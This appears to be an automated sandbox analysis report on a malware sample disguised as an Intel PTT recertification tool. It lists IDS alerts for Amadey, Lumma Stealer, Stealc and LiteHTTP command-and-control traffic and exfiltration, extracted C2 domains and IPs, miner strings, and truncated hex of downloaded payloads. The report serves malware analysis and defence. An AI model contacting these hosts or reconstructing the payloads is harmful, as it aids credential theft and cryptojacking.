Source: Intel_PTT_EK_Recertification.exe, 0000001D.00000003.2985127530.000001D1F82E0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: Intel_PTT_EK_Recertification.exe, 0000001D.00000003.2985127530.000001D1F82E0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: Intel_PTT_EK_Recertification.exe, 0000001D.00000003.2985127530.000001D1F82E0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.131.68.180:443 -> 192.168.2.5:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.5:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.5:49866 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:49951 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:49959 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:49967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:49982 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:49990 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:49996 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:49997 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50004 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50035 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50050 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50058 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50069 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50073 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50075 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50077 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50079 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50084 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50088 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50089 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50090 version: TLS 1.2

Source:

Binary string: C:\Users\Badus\OneDrive\Desktop\Projects\Anubis-Master\Bot\Bot\LiteHTTP\obj\x86\Debug\Anubis.pdb source: 53f7160658.exe, 00000023.00000002.3474117746.0000000000692000.00000040.00000001.01000000.0000000F.sdmp, 53f7160658.exe, 00000023.00000003.3017322242.0000000004A20000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Code function: 7_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	7_2_0040367D
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Code function: 7_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	7_2_004031DC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001D7978 FindFirstFileW,FindFirstFileW,free,	11_2_001D7978

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 11_2_001D881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,

11_2_001D881C

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\main\extracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\main\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49817 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.5:64803 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.5:57659 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.5:59783 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49827
Source: Network traffic	Suricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.5:49849 -> 104.131.68.180:443
Source: Network traffic	Suricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 104.131.68.180:443 -> 192.168.2.5:49849
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49846 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.5:49856 -> 178.62.201.34:443
Source: Network traffic	Suricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 178.62.201.34:443 -> 192.168.2.5:49856
Source: Network traffic	Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.5:53801 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.5:63632 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.5:56126 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.5:57611 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.5:58086 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.5:50642 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49877 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49899 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49928 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49953 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49983 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49995 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50006 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49995 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.5:49995
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49995 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.5:49995
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49995 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:50046 -> 104.154.220.71:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:50055 -> 104.154.220.71:80
Source: Network traffic	Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:50082 -> 185.208.159.109:80
Source: Network traffic	Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:50082 -> 185.208.159.109:80
Source: Network traffic	Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:50082 -> 185.208.159.109:80
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49866 -> 104.121.10.34:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49856 -> 178.62.201.34:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49856 -> 178.62.201.34:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49975 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49849 -> 104.131.68.180:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49849 -> 104.131.68.180:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50004 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50004 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49951 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49951 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49996 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50074 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49996 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50073 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50073 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49959 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50075 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49959 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50075 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50088 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50090 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50089 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50069 -> 104.21.2.110:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat
Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: sweepyribs.lat
Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	IPs: 185.215.113.43

Performs DNS queries to domains with low reputation

Source:	DNS query: diffuculttan.xyz
Source:	DNS query: effecterectz.xyz
Source:	DNS query: diffuculttan.xyz
Source:	DNS query: debonairnukk.xyz

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1

Yara detected Generic Downloader

Source: Yara match

File source: 35.2.53f7160658.exe.690000.0.unpack, type: UNPACKEDPE

Source: unknown

Network traffic detected: DNS query count 47

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Dec 2024 05:03:09 GMTContent-Type: application/octet-streamContent-Length: 1870336Last-Modified: Mon, 16 Dec 2024 17:17:26 GMTConnection: keep-aliveETag: "676060a6-1c8a00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 a0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 49 00 00 04 00 00 77 69 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 20 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 40 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 70 65 64 66 62 69 61 00 10 1a 00 00 80 2f 00 00 06 1a 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 73 6d 77 72 66 68 79 00 10 00 00 00 90 49 00 00 04 00 00 00 64 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 49 00 00 22 00 00 00 68 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Dec 2024 05:03:17 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Dec 2024 05:03:30 GMTContent-Type: application/octet-streamContent-Length: 1763328Last-Modified: Mon, 16 Dec 2024 20:04:16 GMTConnection: keep-aliveETag: "676087c0-1ae800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 b5 7d 5e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 b4 00 00 00 10 00 00 00 00 00 00 00 a0 45 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 45 00 00 04 00 00 f7 c7 1b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 00 01 00 69 00 00 00 00 e0 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 01 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 00 00 00 20 00 00 00 54 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d8 0c 00 00 00 e0 00 00 00 0e 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 00 01 00 00 02 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 20 01 00 00 02 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 73 72 66 69 6d 65 79 00 40 1a 00 00 40 2b 00 00 3c 1a 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 68 70 61 77 69 73 74 00 20 00 00 00 80 45 00 00 04 00 00 00 c2 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 45 00 00 22 00 00 00 c6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Dec 2024 05:03:38 GMTContent-Type: application/octet-streamContent-Length: 4424704Last-Modified: Tue, 17 Dec 2024 04:07:24 GMTConnection: keep-aliveETag: "6760f8fc-438400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c9 b4 5f 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 e2 47 00 00 84 75 00 00 32 00 00 00 00 c6 00 00 10 00 00 00 00 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 